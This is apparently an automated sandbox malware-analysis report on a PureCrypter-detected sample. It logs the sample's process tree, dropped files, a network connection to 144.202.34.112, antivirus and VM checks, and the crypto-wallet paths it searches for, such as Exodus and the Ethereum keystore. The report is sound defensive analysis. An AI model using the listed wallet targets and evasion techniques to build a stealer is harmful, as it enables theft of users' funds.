      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD3493EFF0 GetCurrentProcessId,ProcessPrng,CreateNamedPipeW,GetLastError,CloseHandle,CloseHandle,ReadFileEx,SleepEx,GetLastError,9_2_00007FFD3493EFF0
      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: regsvr32.exe, 0000000E.00000002.2142655028.000000001C0DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000038B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000038B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: com.liberty.jaxx
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000038B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000038B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 1C:\Users\user\AppData\Roaming\Ethereum\keystore
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000038B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000038B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
      Source: powershell.exe, 0000000A.00000002.976333439.00007FFCF4650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
      Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
      Source: Yara matchFile source: 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 8808, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts321
      Windows Management Instrumentation
      1
      Scheduled Task/Job
      213
      Process Injection
      11
      Masquerading
      OS Credential Dumping661
      Security Software Discovery
      Remote Services11
      Archive Collected Data
      2
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Command and Scripting Interpreter
      1
      DLL Side-Loading
      1
      Scheduled Task/Job
      1
      Disable or Modify Tools
      LSASS Memory351
      Virtualization/Sandbox Evasion
      Remote Desktop Protocol1
      Data from Local System
      1
      Non-Standard Port
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Scheduled Task/Job
      Logon Script (Windows)1
      DLL Side-Loading
      351
      Virtualization/Sandbox Evasion
      Security Account Manager3
      Process Discovery
      SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts1
      Native API
      Login HookLogin Hook213
      Process Injection
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud Accounts1
      PowerShell
      Network Logon ScriptNetwork Logon Script11
      Deobfuscate/Decode Files or Information
      LSA Secrets2
      System Owner/User Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
      Obfuscated Files or Information
      Cached Domain Credentials233
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1583336 Sample: 8n26gvrXUM.exe Startdate: 02/01/2025 Architecture: WINDOWS Score: 100 86 Suricata IDS alerts for network traffic 2->86 88 Multi AV Scanner detection for dropped file 2->88 90 Multi AV Scanner detection for submitted file 2->90 92 3 other signatures 2->92 13 8n26gvrXUM.exe 2 2->13         started        16 regsvr32.exe 2->16         started        20 svchost.exe 2->20         started        process3 dnsIp4 72 C:\Users\user\AppData\...\8n26gvrXUM.tmp, PE32 13->72 dropped 22 8n26gvrXUM.tmp 3 5 13->22         started        74 144.202.34.112, 49715, 56001 AS-CHOOPAUS United States 16->74 78 System process connects to network (likely due to code injection or exploit) 16->78 80 Suspicious powershell command line found 16->80 82 Found many strings related to Crypto-Wallets (likely being stolen) 16->82 84 2 other signatures 16->84 25 powershell.exe 16->25         started        76 127.0.0.1 unknown unknown 20->76 file5 signatures6 process7 file8 58 C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32 22->58 dropped 60 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 22->60 dropped 62 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 22->62 dropped 28 cmd.exe 1 22->28         started        94 Loading BitLocker PowerShell Module 25->94 30 conhost.exe 25->30         started        signatures9 process10 process11 32 8n26gvrXUM.exe 2 28->32         started        35 conhost.exe 28->35         started        37 timeout.exe 1 28->37         started        file12 56 C:\Users\user\AppData\...\8n26gvrXUM.tmp, PE32 32->56 dropped 39 8n26gvrXUM.tmp 19 8 32->39         started        process13 file14 64 C:\Users\user\...\netapi32_1.drv (copy), PE32+ 39->64 dropped 66 C:\Users\user\AppData\Roaming\is-J08NI.tmp, PE32+ 39->66 dropped 68 C:\Users\user\AppData\...\unins000.exe (copy), PE32 39->68 dropped 70 4 other files (none is malicious) 39->70 dropped 42 regsvr32.exe 39->42         started        process15 process16 44 regsvr32.exe 42->44         started        signatures17 96 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 44->96 98 Suspicious powershell command line found 44->98 100 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 44->100 102 4 other signatures 44->102 47 powershell.exe 37 44->47         started        50 powershell.exe 37 44->50         started        process18 signatures19 104 Found many strings related to Crypto-Wallets (likely being stolen) 47->104 106 Loading BitLocker PowerShell Module 47->106 52 conhost.exe 47->52         started        54 conhost.exe 50->54         started        process20

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      8n26gvrXUM.exe50%ReversingLabsWin32.Ransomware.PureCrypter
      8n26gvrXUM.exe56%VirustotalBrowse
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_isdecmp.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_setup64.tmp0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_shfoldr.dll0%ReversingLabs
